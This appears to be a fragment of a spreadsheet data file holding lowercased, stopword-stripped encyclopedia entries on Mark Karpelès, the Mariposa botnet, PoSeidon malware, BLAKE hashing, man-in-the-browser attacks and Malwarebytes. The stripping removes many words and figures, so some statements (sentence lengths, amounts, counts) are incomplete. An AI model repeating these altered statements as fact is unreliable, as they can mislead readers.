    <t>mark marie robert karpelès (born june 1985), also sometimes known online alias magicaltux, former bitcoin exchange gox. born france, moved japan 2009. early life education born chenôve, france, child anne-robert karpelès, geologist. raised dijon. between 1995 2000 educated collège prieuré binson châtillon-sur-marne, near dormans. spent year lycée claude bernard paris completing education 2003 lycée louis armand paris. career according karpelès' linkedin page, worked 2003 2005 linux cyberjoueurs software developer network administrator. karpelès developer.in 2009, karpelès founded tibanne ltd., japan-based bitcoin related technology provider. ceo. founding member bitcoin foundation, created 2012 mission standardize promote bitcoin, served board february 2014.karpelès acquired bitcoin exchange site programmer mccaleb 2011 later incorporated tokyo, original owner receiving shares company. filed bankruptcy japan february 2014, chapter title united states code bankruptcy united states (texas) march 2014.karpelès subpoenaed united states department treasury's financial crimes enforcement network appear washington, d.c. provide testimony april 2014. court filing lawyers, karpelès responded lawyer matter therefore declined appear. sought appear d.c. testify 2014.according joint report cyrus farivar technica pierre alonso monde, karpelès found guilty fraud tried absentia france 2010. also admitted "pirated" server french authorities. sentenced suspended year jail.the lawyers ross william ulbricht, defending trial operating undercover silk road marketplace, claimed 2015 pseudonymous "dread pirate roberts" behind silk road karpelès. department homeland security also suspected 2012-2013. karpelès publicly denied claim twitter ulbricht eventually found guilty.after collapse gox, karpelès joined london trust media, company behind freenode private internet access, april 2018. arrest prosecution karpelès arrested august 2015, japanese police suspicion accessed exchange's computer system falsify data outstanding balance; re-arrested allegedly charged embezzlement.karpelès released bail july 2016, required remain japan.on july 2017, pled "not guilty" embezzlement data manipulation charges.on march 2019, tokyo district court found karpelès guilty falsifying data inflate gox’s holdings $33.5 million, sentenced months prison, suspended four years, meaning serve time unless commits additional offenses next four years. court acquitted karpelès number charges, including embezzlement aggravated breach trust, based belief karpelès acted without intent. nonetheless, verdict said karpelès inflicted “massive harm trust users” excuse” “abuse status authority perform clever criminal acts.” karpelès issued statement saying “happy judged guilty” serious charges discussing proceed lawyers regarding conviction falsifying data charge. bankruptcy proceedings gox's bankruptcy proceedings scheduled repay creditors japanese price around dollars bitcoin (total 45.6 billion japanese million dollars), reported would leave karpelès, creditors repaid, bulk wealth left difference. based market price beginning 2022 (around $35,000 bitcoin), difference gargantuan, ruling would leave karpelès bitcoins valued 3.27 billion dollars.in june 2018, tokyo district court approved petition creditors begin civil rehabilitation proceedings lieu bankruptcy. proceedings flexible, creditors expected would compensated based current value lost coins. august 2018, creditors able begin filing claims civil rehabilitation proceedings. however, june 2021, u.s. federal lawsuit customers unable proceed class-action lawsuit, putting hope compensation jeopardy. references external links mark karpelès twitter</t>
  </si>
  <si>
    <t>Mariposa botnet</t>
  </si>
  <si>
    <t>mariposa botnet, discovered december 2008, botnet mainly involved cyberscamming denial-of-service attacks. before botnet dismantled december 2009, consisted million unique addresses million individual zombie computers infected "butterfly (mariposa spanish) bot", making largest known botnets. history origins initial spread botnet originally created team (spanish: días pesadilla team, english: nightmare days team), using malware program called "butterfly bot", also sold various individuals organisations. goal malware program install uninfected monitoring activity passwords, bank credentials credit cards. after malware would attempt self-propagate connectible systems using various supported methods, msn, usb.after completing initial infection routine malware would contact command-and-control server within botnet. this command control server could used controllers botnet, order issue orders botnet itself. operations impact operations executed botnet diverse, part parts botnet could rented third party individuals organizations. confirmed activities include denial-of-service attacks, e-mail spam, theft personal information, changing search results browser would display order show advertisements pop-up ads.due size nature botnet total financial social impact difficult calculate, initial estimates calculated removal malware alone could cost "tens millions dollars". after apprehension botnet's operators government officials also discovered list containing personal details 800,000 individuals, could used sold identity theft purposes. dismantling 2009 mariposa working group (mwg) formed informal group, composed defence intelligence, georgia tech information security center panda security, along additional unnamed security researchers enforcement agencies. goal group analysis extermination mariposa botnet itself.on december 2009 mariposa working group managed take control mariposa botnet, seizing control command-and-control servers used botnet. operational owners botnet eventually succeeded regaining control botnet, response launched denial-of-service attack defence intelligence. attack managed knock internet connectivity large share isp's customers, included several canadian universities government agencies.on february 2010, spanish national police arrested florencio carro ruiz (alias: netkairo) suspected leader team. additional arrests made february 2010. jonathan pazos rivera (alias: jonyloleante) juan josé ríos bellido (alias: ostiator) arrested suspicion members ddp.on july 2010, matjaž škorjanc (alias: iserdo), creator "butterfly bot" malware, arrested maribor slovenian police first time, released lack evidence. arrested october 2011. december 2013 škorjanc convicted slovenia "creating malicious computer program hacking information systems, assisting wrongdoings money laundering." sentenced years months imprisonment fined €3,000 ($3,000). court also ordered seizure škorjanc's property acquired proceeds crime. after appealed verdict fine february 2015 raised additional 25,000 eur.on june, 2019, enforcement opened case operations mariposa (butterfly bot, bfbot) malware gang. moved forward charges arrest warrants four suspects including nicehash's operator matjaž škorjanc. references external links analysis mariposa botnet</t>
  </si>
  <si>
    <t>Prevx</t>
  </si>
  <si>
    <t>prevx discontinued anti-malware utility. there separate real-time on-demand versions. remove low-risk adware free, user purchase enter license serious. scanning take anywhere less minutes five minutes. reception tony zaitoun, about.com, liked utility except confusion configuring interface protection disabled default. issue referenced since corrected. awards editors' choice magazine platinum standard checkmark west coast labs history prevx limited formed march 2001 registered name “immunify”, changing name “trustcorps” later year finally re-branded “prevx” 2003. founder team nick paul stubbs coo. originally positioned host intrusion prevention system, company's initial software product designed protect unix linux servers advanced malware threats without reliance malware signatures, thus providing protection unknown “zero-day” threats. software positioned last line defence threats bypassed overcome firewall, network security installed anti-virus host-based protection systems. this early product monitored behaviour executables real-time would block system calls breached rules, thus providing protection. offered protection buffer overflow attacks could successfully detect rootkits attempted hide memory disk. 2002, company received investment south east growth fund early 2003 private investors angel network, hotbed. 2003, company rebranded prevx june 2004 launched first product windows platform, “prevx home beta”, offered freeware download. prevx home (also free) followed september 2004. prevx home launched october 2004 incorporated functionality report security events detected central database, operated prevx, would allow prevx monitor virus outbreaks detect block spyware. 2004, months launching, copies prevx downloaded. subsequent versions included prevx 3.0, prevx edge prevx csi. controversy prevx stirred controversy amongst internet communities announced november 2009 recent windows update causing "black screen death", affecting users windows vista they claimed rendered machine unusable. later discovered black screen caused malware infection (with daonol), unrelated windows update. prevx apologized earlier claims. acquisition 2005, prevx acquired share offer retento limited, investment vehicle owned serial entrepreneur morris, joined prevx board june 2003 investor prevx introduced hotbed. retento subsequently renamed prevx group limited. november 2010, prevx acquired us-based internet security company webroot. full conditions deal released announcement made webroot fully integrate prevx's behaviour-based antivirus technology existing software also make morris, founder chief executive prevx group, vice president webroot's prevx division. webroot since discontinued prevx product line although technology concepts continue underpin webroot products. references</t>
  </si>
  <si>
    <t>PoSeidon (malware)</t>
  </si>
  <si>
    <t>poseidon name family malicious computer programs targeting computerized point-of-sale systems. history cisco's "talos" computer security research laboratory discovered introduced family malware nickname "poseidon" security blog march 2015. operation malware attempts steal keystrokes credit card numbers stored system memory, scanning discover, visa, mastercard amex issued credit cards. credit card data encrypted sent (exfiltrated) number predefined russian servers.if commercial remote administration software logmein installed, logmein settings modified, forcing next remote user enter username password. this allows username password read keylogger exfiltrated. references</t>
  </si>
  <si>
    <t>BLAKE (hash function)</t>
  </si>
  <si>
    <t>blake cryptographic hash function based daniel bernstein's chacha stream cipher, permuted copy input block, xored round constants, added chacha round. like sha-2, variants differing word size. chacha operates array words. blake repeatedly combines 8-word hash value message words, truncating chacha result obtain next hash value. blake-256 blake-224 32-bit words produce digest sizes bits bits, respectively, blake-512 blake-384 64-bit words produce digest sizes bits bits, respectively. blake2 hash function, based blake, announced 2012. blake3 hash function, based blake2, announced 2020. history blake submitted nist hash function competition jean-philippe aumasson, luca henzen, willi meier, raphael c.-w. phan. 2008, entries. blake made final round consisting five candidates lost keccak 2012, selected sha-3 algorithm. algorithm like sha-2, blake comes variants: uses 32-bit words, used computing hashes bits long, uses 64-bit words, used computing hashes bits long. core block transformation combines words input working variables, words (256 bits) preserved blocks. uses table constant words (the leading 1024 bits fractional part table 16-element permutations: σ[0] σ[1] σ[2] σ[3] σ[4] σ[5] σ[6] σ[7] σ[8] σ[9] core operation, equivalent chacha's quarter round, operates 4-word column diagonal combined words message constant words n[]. performed times full round: σ[r%10][2×i] index computations σ[r%10][2×i+1] (m[j] n[k]) step (with input) step input) (m[k] n[j]) step (with input) step input) above, round number (0–13), varies differences chacha quarter-round function are: addition message words added. rotation directions reversed."blake reuses permutation chacha stream cipher rotations done opposite directions. some suspected advanced optimization, fact originates typo original blake specifications", jean-philippe aumasson explains "crypto dictionary".the 64-bit version (which exist chacha) identical, rotation amounts respectively, number rounds increased tweaks throughout nist hash function competition, entrants permitted "tweak" algorithms address issues discovered. changes made blake are: number rounds increased 10/14 14/16. this conservative security still fast. example digests hash values empty string: blake-224("") 7dc5313b1c04512a174bd6503b89607aecbee0903d40a8a569c94eed blake-256("") 716f6e863f744b9ac22c97ec7b76ea5f5908bc5b2f67c61510bfc4751384ea7a blake-384("") c6cbd89c926ab525c242e6621f2f5fa73aa4afe3d9e24aed727faaadd6af38b620bdb623dd2b4788b1c8086984af8706 blake-512("") a8cfbbd73726062df0c6864dda65defe58ef0cc52a5625090fa17601e1eecd1b628e94f396ae402a00acc9eab77b4d4c2e852aaaa25a636d80af3fc7913ef5b8 changing single causes output change probability, demonstrating avalanche effect: blake-512("the quick brown jumps lazy dog") 1f7e26f63b6ad25a0896fd978fd050a1766391d2fd0471a77afb975e5034b7ad2d9ccf8dfb47abbbe656e1b82fbc634ba42ce186e8dc5e1ce09a885d41f43451 blake-512("the quick brown jumps lazy dof") a701c2a1f9baabd8b1db6b75aee096900276f0b86dc15d247ecc03937b370324a16a4ffc0c3a85cd63229cfa15c15f4ba6d46ae2e849ed6335e9ff43b764198a blake2 blake2 cryptographic hash function based blake, created jean-philippe aumasson, samuel neves, zooko wilcox-o'hearn, christian winnerlein. design goal replace widely used, broken, sha-1 algorithms applications requiring high performance software. blake2 announced december 2012. reference implementation available cc0, openssl license, apache public license 2.0.blake2b faster md5, sha-1, sha-2, sha-3, 64-bit x86-64 architectures. blake2 provides better security sha-2 similar sha-3: immunity length extension, indifferentiability random oracle, etc.blake2 removes addition constants message words blake round function, changes rotation constants, simplifies padding, adds parameter block xor'ed initialization vectors, reduces number rounds blake2b (successor blake-512), blake2s (successor blake-256). blake2 supports keying, salting, personalization, hash tree modes, output digests bytes blake2b, bytes blake2s. there also parallel versions designed increased performance multi-core processors; blake2bp (4-way parallel) blake2sp (8-way parallel). blake2x family extensible-output functions (xofs). whereas blake2 limited 64-byte digests, blake2x allows digests gib. blake2x instance hash function, must based actual blake2 instance. example blake2x instance could blake2xb16mib, would blake2x version based blake2b producing 16,777,216-byte digests exactly mib, hence name instance).blake2b blake2s specified 7693. optional features using parameter block (salting, personalized hashes, tree hashing, cetera), specified, thus neither support blake2bp, blake2sp, blake2x.blake2sp blake2 version used 7zip file compressor signature context menu "crc sha" initialization vector blake2b uses initialization vector used sha-512. these values transparently obtained taking first bits fractional parts positive square roots first eight prime numbers. 0x6a09e667f3bcc908 frac(sqrt(2)) 0xbb67ae8584caa73b frac(sqrt(3)) 0x3c6ef372fe94f82b frac(sqrt(5)) 0xa54ff53a5f1d36f1 frac(sqrt(7)) 0x510e527fade682d1 frac(sqrt(11)) 0x9b05688c2b3e6c1f frac(sqrt(13)) 0x1f83d9abfb41bd6b frac(sqrt(17)) 0x5be0cd19137e2179 frac(sqrt(19)) blake2b algorithm pseudocode blake2b algorithm. blake2b algorithm uses 8-byte (uint64) words, 128-byte chunks. algorithm blake2b input: message hashed cbmessagelen: number, (0..2128) length message bytes optional 0..64 byte cbkeylen: number, (0..64) length optional bytes cbhashlen: number, (1..64) desired hash length bytes output: hash hash cbhashlen bytes initialize state vector h0..7 iv0..7 size (cbkeylen) desired hash length (cbhashlen) 0x0101kknn length bytes) desired hash length bytes) each time compress record many bytes compressed cbytescompressed cbytesremaining cbmessagelen supplied (i.e. cbkeylen trailing zeros make 128-bytes (i.e. words) prepend message (cbkeylen pad(key, 128) cbytesremaining cbytesremaining compress whole 128-byte chunks message, except last chunk (cbytesremaining 128) chunk next bytes message cbytescompressed cbytescompressed increase count bytes compressed cbytesremaining cbytesremaining decrease count bytes remaining processed compress(h, chunk, cbytescompressed, false) false last chunk compress final bytes chunk next bytes message cbytesremaining bytes (i.e. 0..128 bytes) cbytescompressed cbytescompressed+cbytesremaining actual number bytes leftover chunk pad(chunk, 128) empty, still compress final chunk zeros compress(h, chunk, cbytescompressed, true) true last chunk result first cbhashlen bytes little endian state vector algorithm blake2b compress compress function takes full 128-byte chunk input message mixes ongoing state array: function compress input: persistent state vector chunk 128-byte double word) chunk message compress number, 0..2128 count bytes compression islastblock: boolean indicates final round compression output: updated persistent state vector setup local work vector v0..7 h0..7 first eight items copied persistent state vector v8..15 iv0..7 remaining eight items initialized 128-bit counter v12:v13 lo(t) 64-bits uint128 hi(t) 64-bits uint128 last block invert bits islastblock 0xffffffffffffffff treat 128-byte message chunk sixteen 8-byte (64-bit) words m0..15 chunk twelve rounds cryptographic message mixing select message mixing schedule round. blake2b uses rounds, sigma entries. s0..15 sigma[i rounds sigma[0] sigma[1] respectively mix(v0, v12, m[s0], m[s1]) mix(v1, v13, m[s2], m[s3]) mix(v2, v10, v14, m[s4], m[s5]) mix(v3, v11, v15, m[s6], m[s7]) mix(v0, v10, v15, m[s8], m[s9]) mix(v1, v11, v12, m[s10], m[s11]) mix(v2, v13, m[s12], m[s13]) mix(v3, v14, m[s14], m[s15]) upper lower halves ongoing state vector h0..7 h0..7 v0..7 h0..7 h0..7 v8..15 result function compress function called compress function, mixes 8-byte words message hash state. implementations function would written inline, inlined function. function inputs: four 8-byte word entries work vector 8-byte word entries padded message output: modified versions input rotateright input rotateright input rotateright input rotateright result vdend function example digests hash values empty string: blake2s-224("") 1fa1291e65248b37b3433475b2a0dd63d54a11ecc4e3e034e7bc1ef4 blake2s-256("") 69217a3079908094e11121d042354a7c1f55b6482ca1a51e1b250dfd1ed0eef9 blake2b-384("") b32811423377f52d7862286ee1a72ee540524380fda1724a6f25d7978c6fd3244a6caf0498812673c5e05ef583825100 blake2b-512("") 786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce changing single causes output change probability, demonstrating avalanche effect: blake2b-512("the quick brown jumps lazy dog") a8add4bdddfd93e4877d2746e62817b116364a1fa7bc148d95090bc7333b3673f82401cf7aa2e4cb1ecd90296e3f14cb5413f8ed77be73045b13914cdcd6a918 blake2b-512("the quick brown jumps lazy dof") ab6b007747d8068c02e25a6008db8a77c218d94f3b40d2291a7dc8a62090a744c082ea27af01521a102e42f480a31e9844053f456b4b41e8aa78bbe5c12957bb users blake2 argon2, winner password hashing competition uses blake2b chef's habitat deployment system uses blake2b package signing freebsd ports package management tool uses blake2b core utilities implements blake2b b2sum command ipfs allows blake2b tree hashing librsync uses blake2b noise (cryptographic protocol), used whatsapp includes blake2 option. file archive format version supports optional 256-bit blake2sp file checksum instead default 32-bit crc32; implemented winrar 7-zip generate blake2sp signature file explorer shell "crc sha" context menu, choosing rmlint uses blake2b duplicate file detection wireguard uses blake2s hashing zcash, cryptocurrency, uses blake2b equihash proof work, derivation function nano, cryptocurrency, uses blake2b proof work, hashing digital signatures derivation function polkadot, multi-chain blockchain uses blake2b hashing algorithm. vault, uses blake2b hashing algorithm purpose compliant tokenization. ergo, cryptocurrency, uses blake2b256 subroutine hashing algorithm called autolykos. linux kernel, version 5.17 replaced sha-1 blake2s hashing entropy pool random number generator. implementations addition reference implementation, following cryptography libraries provide implementations blake2: botan bouncy castle crypto++ libgcrypt libsodium openssl wolfssl blake3 blake3 cryptographic hash function based blake2, created jack o'connor, jean-philippe aumasson, samuel neves, zooko wilcox-o'hearn. announced january 2020, real world crypto.blake3 single algorithm many desirable features (parallelism, xof, kdf, mac), contrast blake blake2, algorithm families multiple variants. blake3 binary tree structure, supports practically unlimited degree parallelism (both simd multithreading) given long enough input. official rust implementations dual-licensed public domain (cc0) apache license.blake3 designed fast possible. consistently times faster blake2. blake3 compression function closely based blake2s, biggest difference number rounds reduced change based assumption current cryptography conservative. addition providing parallelism, merkle tree format also allows verified streaming (on-the-fly verifying) incremental updates. references external links blake site blake2 site blake3 site</t>
  </si>
  <si>
    <t>Man-in-the-browser</t>
  </si>
  <si>
    <t>man-in-the-browser (mitb, mitb, mib, mib), form internet threat related man-in-the-middle (mitm), proxy trojan horse infects browser taking advantage vulnerabilities browser security modify pages, modify transaction content insert additional transactions, covert fashion invisible user host application. mitb attack successful irrespective whether security mechanisms ssl/pki and/or two- three-factor authentication solutions place. mitb attack countered using out-of-band transaction verification, although verification defeated man-in-the-mobile (mitmo) malware infection mobile phone. trojans detected removed antivirus software; approach scored success rate zeus 2009 still rates 2011 report. 2011 report concluded additional measures antivirus software needed.a related, simpler attack boy-in-the-browser (bitb, bitb). majority financial service professionals survey considered mitb greatest threat online banking. description mitb threat demonstrated augusto paes barros 2005 presentation backdoor trends "the future backdoors worst worlds". name "man-in-the-browser" coined philipp gühring january 2007.a mitb trojan works using common facilities provided enhance browser capabilities browser helper objects feature limited internet explorer), browser extensions user scripts (for example javascript). antivirus software detect methods.in nutshell example exchange user host, internet banking funds transfer, customer always shown, confirmation screens, exact payment information keyed browser. bank, however, receive transaction materially altered instructions, i.e. different destination account number possibly amount. strong authentication tools simply creates increased level misplaced confidence part customer bank transaction secure. authentication, definition, concerned validation identity credentials. this confused transaction verification. examples examples mitb threats different operating systems browsers: protection antivirus known trojans detected, blocked, removed antivirus software. 2009 study, effectiveness antivirus zeus 23%, success rates reported separate test 2011. 2011 report concluded additional measures antivirus needed. hardened software browser security software: mitb attacks blocked in-browser security software cymatic.io, trusteer rapport microsoft windows blocks apis browser extensions controls communication. alternative software: reducing eliminating risk malware infection using portable applications using alternatives microsoft windows like linux, mobile oses android, ios, chrome windows mobile, symbian, etc., and/or browsers chrome opera. further protection achieved running alternative like linux, non-installed live live usb. secure browser: several vendors provide two-factor security solution secure browser part solution. case, mitb attacks avoided, user executes hardened browser two-factor security device rather executing "infected" browser machine. out-of-band transaction verification theoretically effective method combating mitb attack out-of-band (oob) transaction verification process. this overcomes mitb trojan verifying transaction details, received host (bank), user (customer) channel browser; example, automated telephone call, sms, dedicated mobile graphical cryptogram. transaction verification ideal mass market since leverages devices already public domain (e.g. landline, mobile phone, etc.) requires additional hardware devices, enables three-factor authentication (using voice biometrics), transaction signing non-repudiation level), transaction verification. downside transaction verification adds level end-user's frustration slower steps. man-in-the-mobile mobile phone mobile trojan spyware man-in-the-mobile (mitmo) defeat transaction verification. zitmo (zeus-in-the-mobile) mitb trojan (although performs similar proxy function incoming smses), mobile malware suggested installation mobile phone zeus-infected computer. intercepting incoming smses, defeats sms-based banking two-factor authentication windows mobile, android, symbian, blackberry. zitmo detected antivirus running mobile device. spitmo (spyeye-in-the-mobile, spitmo) similar zitmo. fraud detection fraud detection implemented bank automatically check anomalous behaviour patterns transactions. related attacks proxy trojans keyloggers primitive form proxy trojans, followed browser-session recorders capture data, lastly mitbs sophisticated type. man-in-the-middle ssl/pki etc. offer protection man-in-the-middle attack, offers protection man-in-the-browser attack. boy-in-the-browser related attack simpler quicker malware authors termed boy-in-the-browser (bitb bitb). malware used change client's computer network routing perform classic man-in-the-middle attack. once routing changed, malware completely remove itself, making detection difficult. clickjacking clickjacking tricks browser user clicking something different user perceives, means malicious code webpage. ddos wi-fi related exploits some phones tablets current known vulnerability ddos wi-fi, documented certain android phones. vulnerability attacker detects someone using sharing, possible target phone tablet directly using packet collision similar found networks requiring guessing device sharing password using rainbow table cloning ssid, thus forcing reboot enough data built causing buffer overflow. during narrow window, malicious software used install rootkit malware diagnostics channel antivirus chance load similar sideloading works. appears defense present using sharing changing password short random interval, e.g. wpa2-tkip, devices support. wpa3-otp solution sufficiently large memory ends used, e.g. also browser security form grabbing risk threat (computer) timeline computer viruses worms online banking security token transaction authentication number hijacking references external links virus attack hsbc transactions device virus attack icici bank transactions virus attack citibank transactions hackers outwit online banking identity security systems click antisource zeus summary zeus trojan botnet, plus vector attacks man-in-the-browser video youtube entrust president bill conner zeus: king crimeware toolkits video youtube zeus toolkit, symantec security response safe online banking? audio click boy-in-the-browser cyber attack video youtube imperva</t>
  </si>
  <si>
    <t>Malwarebytes</t>
  </si>
  <si>
    <t>malwarebytes inc. american internet security company specializes protecting home computers, smartphones, companies malware threats. offices santa clara, california; clearwater, florida; tallinn, estonia; bastia umbra, italy; cork, ireland. history early history background malwarebytes inc. informally established 2004. founder marcin kleczynski, originally poland, still teenager attending high school bensenville, illinois time, working technician computer repair shop chicago. noticed whenever infected computers arrived, shop would typically reformat computer entirely, rather combat virus, even infection minor. kleczynski later discovered that, mother's computer became infected, neither mcafee symantec would remove malware system. later recalled "i've never angry computer infected", professed mother told "under penalty death". kleczynski posted forum spywareinfo, popular time, able learn remove virus, took three days. company unofficially founded this, kleczynski conversed became friends several editors forum, tempted unused domain them.with site's regulars, bruce harrison, kleczynski wrote inaugural version company's software. 2006, kleczynski worked college roommate produce freely available program called "rogueremover", utility specialized fighting type infection known "rogues", scam computer users giving away credit card information fake anti-virus software. rogueremover proved instrumental developing malwarebytes anti-malware, kleczynski able forum enabled improve software feedback. kleczynski harrison formally launched malwarebytes january 2008 kleczynski studying computer science university illinois. bruce became research malwarebytes, hired doug swanson, experience freeware development work company. marcus chung, e-commerce expert formerly worked greenborder, hired chief operating officer. kleczynski harrison reportedly made $600,000 first year selling software, despite personally time. post-2010 developments 2011, malwarebytes acquired hphosts, website blacklisting company, tracks blacklisted websites servers, necessary development protect internet protocol addresses servers distribute malware, advise internet service providers shut malicious activity. that year, company claimed removed five billion pieces malware three years. following year, company launched corporate market enterprise product aimed desktop-based anti-malware detection protection. 2013, malwarebytes acquired zerovulnerabilitylabs, inc., security research development company founded pedro bustamante, protects software applications "known zero-day exploits used exploit kits, web-based vulnerability exploits corporate-targeted attacks". they expanded malware removal protection android platform launch malwarebytes anti-malware mobile, launched usb-based product called malwarebytes techbench aimed helping technicians remove malware.in 2014, malwarebytes received million funding highland capital, following year announced treated million computers worldwide, representing 20–25% working business computers. 2013 claimed removed five billion malware threats computers first five years. june 2015, company announced moving headquarters almaden boulevard jose, california 52,000 square feet (4,800 office space floors 12-story 3979 freedom circle santa clara, california. office twice size former office. company reported growth million users year, million active users time, increase revenue 1653% 2014. 2015, kleczynski named forbes magazine's under 30'.in january 2016, malwarebytes unveiled advanced anti-ransomware package endpoint security, announced raised million investment fidelity management research company. kleczynski stated funds would used primarily company's hiring, product development marketing assets. june, malwarebytes announced strong growth sales percent first quarter year compared 2015, billings surpassing $100 million. corporate subscription base company reported grown 90%. september, proofpoint, inc. gary steele joined company's board directors, kleczynski citing "deep expertise security software industry, proven ability [at] increasing sales revenue" main reasons appointment. october company purchased adwcleaner, windows program used clean adware potentially unwanted programs (pups) computers. february 2017 company acquired saferbytes, italian security start-up specialized anti-malware, anti-exploit, anti-rootkit, cloud sandbox technologies.in november 2019, company joined forces competitors nortonlifelock kaspersky along electronic frontier foundation non-profits including national network domestic violence operation safe escape form coalition against stalkerware. coalition seeks inform, educate combat tracking apps without consent. post-2020 developments january 2021, malwarebytes targeted nation state actor implicated solarwinds attack suffered limited access breach. kleczynski published blog post detailing company’s attack response. february 2021, malwarebytes published 2021 state malware report shared cyberthreat research including million examples malware 1,055% increase spyware detections 2020. 2021, malwarebytes announced collaboration digitunity deliver cyberprotection vulnerable communities underserved technology access, expanding portfolio social impact work. executive leadership marcin kleczynski malwarebytes since 2008.in 2018, malwarebytes hired former angi, fox, serve company. 2021 promoted president, retaining title role.in 2020, malwarebytes promoted chief revenue officer barry mainz chief operating officer scaled global marketing, consumer customer growth customer success two-year tenure company.in 2020 malwarebytes recruited dariusz paczuski senior vice president marketing, promoted 2021. 2021, former logmein executive, mark strassman joined malwarebytes chief product officer. services products kleczynski stated malwarebytes, first developed 2008, competitive advantage many traditional antivirus programs, many developed late 1990s, development many later forms malware. york times described malwarebytes "hybrid heuristics, behavior signature engine designed detect block malware vendors can't detect". according dean takahashi venturebeat, malwarebytes complements antivirus software vendors symantec mcafee, anti-malware working alongside anti-virus software attack problem "different directions", remarking software removed infections infected machines, whilst preventing others becoming infected first place.as early development days rogueremover, malwarebytes continues support community feedback products, runs sub-forums complementing main forum, known "false positives" "malware contribution", false positives reported allowing company update database within hours posting, malware contribution allowing users quickly report malware missed software. products malwarebytes several products, 2011 available different languages. malwarebytes anti-malware offers different versions, free download home computers, professional version, 14-day free trial advance, offering "real-time protection malware, automated scanning, automatic updating". malwarebytes anti-malware mobile free android protects smartphones mobile malware, preventing unauthorized access personal data identifying tracking applications. rating google play store.in 2014, company launched malwarebytes anti-malware improved user interface dashboard. company also launched malwarebytes anti-exploit year, shields selected applications attacks "exploit mitigation protect vulnerable programs". anti-exploit also comes free paid version windows computers. free version stops exploits browsers java, whilst paid product adds protection wider range software applications. anti-exploit received four stars magazine 2015 magazine's "security innovation year" award 2014.in 2016, malwarebytes anti-exploit merged premium version malwarebytes version 3.0, standalone application offered perpetual beta.in january 2016, malwarebytes unveiled malwarebytes endpoint security, advanced anti-ransomware technology described "first solution offer multiple layers protection unknown ransomware". company sponsored survey osterman research firms united states, united kingdom, canada germany found nearly companies experienced ransomware incidents, percent accounted loss revenue. guardian reported one-fifth british companies charged $10,000 unlock files increasing demand anti-ransomware technology. after endpoint's inception, beta reportedly downloaded 200,000 businesses consumers first months year.in 2017, malwarebytes expanded portfolio include mobile products android including malwarebytes android malwarebytes mac. malwarebytes also chromeos, mainly provides protection android threats. malwarebytes also released malwarebytes 2018 deliver secure private mobile experiences users. apple's security restrictions, malwarebytes remove malware, provide basic protection spam blocking. 2020, malwarebytes privacy, offering, launched. 2018, malwarebytes expanded business portfolio launching malwarebytes endpoint protection response monitor, identify remediate attacks. this offering extended 2020 include server protection enterprise customers malwarebytes endpoint detection response servers malwarebytes endpoint protection servers. 2020, malwarebytes also launched malwarebytes nebula, cloud platform enterprise customers simplify endpoint management reporting. malwarebytes also numerous tools junkware removal tool remove adware, anti-rootkit beta remove repair rootkits, startuplite boost speed windows reboot, fileassassin prevent locked files malware removal service support organizations active malware attack. license privacy software license requires arbitration county reside", forbids class action suits, reverse engineering sharing, limits warranties liability. even free version shared, since company tracks product separately user. malwarebytes' privacy policy lists many types information collect store, including, amongst things, software running user's computer ("programs installed use"), "name, email address, mailing address, phone number... company name, company size, business type... internet protocol (ip) addresses, browser type, internet service provider (isp), referring/exit pages, files viewed site operating system, date/time stamp, and/or clickstream data type device use, operating system version, unique device identifier... language... 64-bit... information windows security/action center, including security settings programs installed use... license... number seats managed installation console[,] endpoint domain information... organization address licensed, any".there different limits use, sale, sharing data: limits call "non-personally identifiable information ('non-pii')". "non-pii include... anonymously generated device identifiers", tied data items listed above. limited uses personally identifiable information (pii), including name, address, phone, company name, size business type, share third parties" except situations listed privacy policy, include "may disclose government private parties satisfy... regulation subpoenas... protect public general; prevent stop activity consider illegal unethical." company also discloses enough information provide "advertising based upon browsing activities interests."in general, company time limits long keep user data, except address users deletion pii: retain address... however, gather continent, country, city, approximate latitude/ longitude type connection (dialup/broadband/satellite/mobile) isp... organization address licensed, any". "you access modify [personally identifiable information]... want delete pii... delete information soon possible; however, information remain archived/backup copies records otherwise required law. retain information long account active needed provide services, comply legal obligations, resolve disputes enforce agreements." they define exclude device identifiers, promise delete identifiers user history.while malwarebytes saves locations addresses, including mobile devices, company stated information used extract locations mobile devices: for, access track location based information mobile device time downloading using mobile apps services." company stated track antenna locations. company also collects detailed information malware exploits find, tied user's license number device identifier, "vendor... file path exploit process... command-line arguments passed exploit... (potentially) copy exploit executable itself". company list license number pii. malwarebytes certificate truste, among things certifies company "limits information collected limits specified privacy notice." also antivirus software comparison computer viruses references external links official website</t>
  </si>
  <si>
    <t>Malwarebytes (software)</t>
  </si>
  <si>
    <t>malwarebytes (formerly malwarebytes anti-malware, abbreviated mbam) anti-malware software microsoft windows, macos, chrome android, finds removes malware. made malwarebytes corporation, first released january 2006. available free version, scans removes malware started manually, paid version, additionally provides scheduled scans, real-time protection flash-memory scanner. overview malwarebytes primarily scanner scans removes malicious software, including rogue security software, adware, spyware. malwarebytes scans batch mode, rather scanning files opened, reducing interference another on-demand anti-malware software also running computer.malwarebytes available free paid version. free version manually user desired, whereas paid version perform scheduled scans, automatically scan files opened, block addresses malicious sites, scan services, programs device drivers currently use. december 2016, malwarebytes inc. released version general public. this includes protection malware, ransomware, exploit, malicious websites. security vulnerabilities february 2016, project zero discovered four vulnerabilities malwarebytes flagship product, including lack server-side encryption update files lack proper payload signing within encrypted data; combination allowed attacker recompile encrypted payload exploits. malwarebytes responded disclosure blog article detailing extreme difficulty executing attacks, well revealing announced server-side encryption issues resolved within days private disclosure outstanding time project zero published research. malwarebytes also published information protect current users patch released. this event also resulted establishment formal bounty program malwarebytes, offers $1000 disclosure 2018, depending severity exploitability. dispute iobit november 2009, malwarebytes accused iobit, chinese company offers similar products, incorporating database malwarebytes anti-malware (and several products vendors, named) security software iobit security 360. iobit denied accusation stated database based user submissions, sometimes signature names malwarebytes placed results. they said time filter signature names similar malwarebytes. iobit also stated malwarebytes convincing proof, declared databases stolen. after declaration iobit, malwarebytes replied convinced argument iobit. malwarebytes claims served dmca infringement notices cnet, download.com majorgeeks order download sites remove iobit software. iobit said version 1.3, database updated address accusations intellectual property theft made earlier malwarebytes. reception world's preston gralla wrote "using malwarebytes anti-malware simplicity itself". cnet 2008 cited malwarebytes useful antivirus malware also awarded april 2009 editor's choice, along computer applications. mark gibbs network world gave malwarebytes anti-malware stars january 2009 wrote lack detailed explanation found stops getting magazine gave malwarebytes anti-malware stars 2010, saying although good removing malware scareware, fell short removing keyloggers rootkits. however, free version stars editor's choice award free removal-only antivirus software 2013-4. also internet security comparison computer viruses references external links official website</t>
  </si>
  <si>
